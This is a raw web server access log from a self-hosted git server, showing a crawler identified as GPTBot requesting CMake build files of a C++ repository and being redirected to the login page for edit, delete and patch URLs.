[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9859] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 19179] [Gzip 14.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 961] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13938] [Gzip 7.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10934] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11298] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 1059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:47:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10358] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:47:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] 